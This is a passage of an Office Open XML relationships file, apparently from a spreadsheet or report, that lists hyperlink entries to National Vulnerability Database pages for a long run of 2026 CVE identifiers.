Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51190" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51775" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52098" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52102" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52103" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52111" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52466" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52490" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52889" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52924" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53002" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53006" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53545" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53611" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54569" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55546" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55559" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56207" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57967" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61808" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62916" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63223" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67868" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67917" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67919" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67967" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68004" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68502" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68503" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69240" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71624" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71625" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71805" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7188" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72920" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73211" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73778" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75003" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75325" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75337" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75338" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75430" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75816" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76578" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76904" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77647" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77649" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77650" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77651" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77806" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78362" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78573" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7861" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78745" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79391" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79689" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79724" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79941" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80129" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80131" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80172" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80351" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80352" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81204" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81467" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82923" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83627" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8376" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85025" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85102" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85103" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85504" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85506" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85507" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85508" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85509" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86219" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86304" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86478" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86480" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87534" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87544" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8778" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88018" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88278" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9163" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19274" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39821" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47705" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50540" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53546" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53548" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53552" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53649" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54523" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54694" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54725" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54754" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54755" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55085" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71193" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71319" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72737" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72877" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72878" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73300" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73843" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81048" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82100" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82107" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84333" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84352" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84353" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85042" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85047" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85050" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85085" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87438" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87448" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87455" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 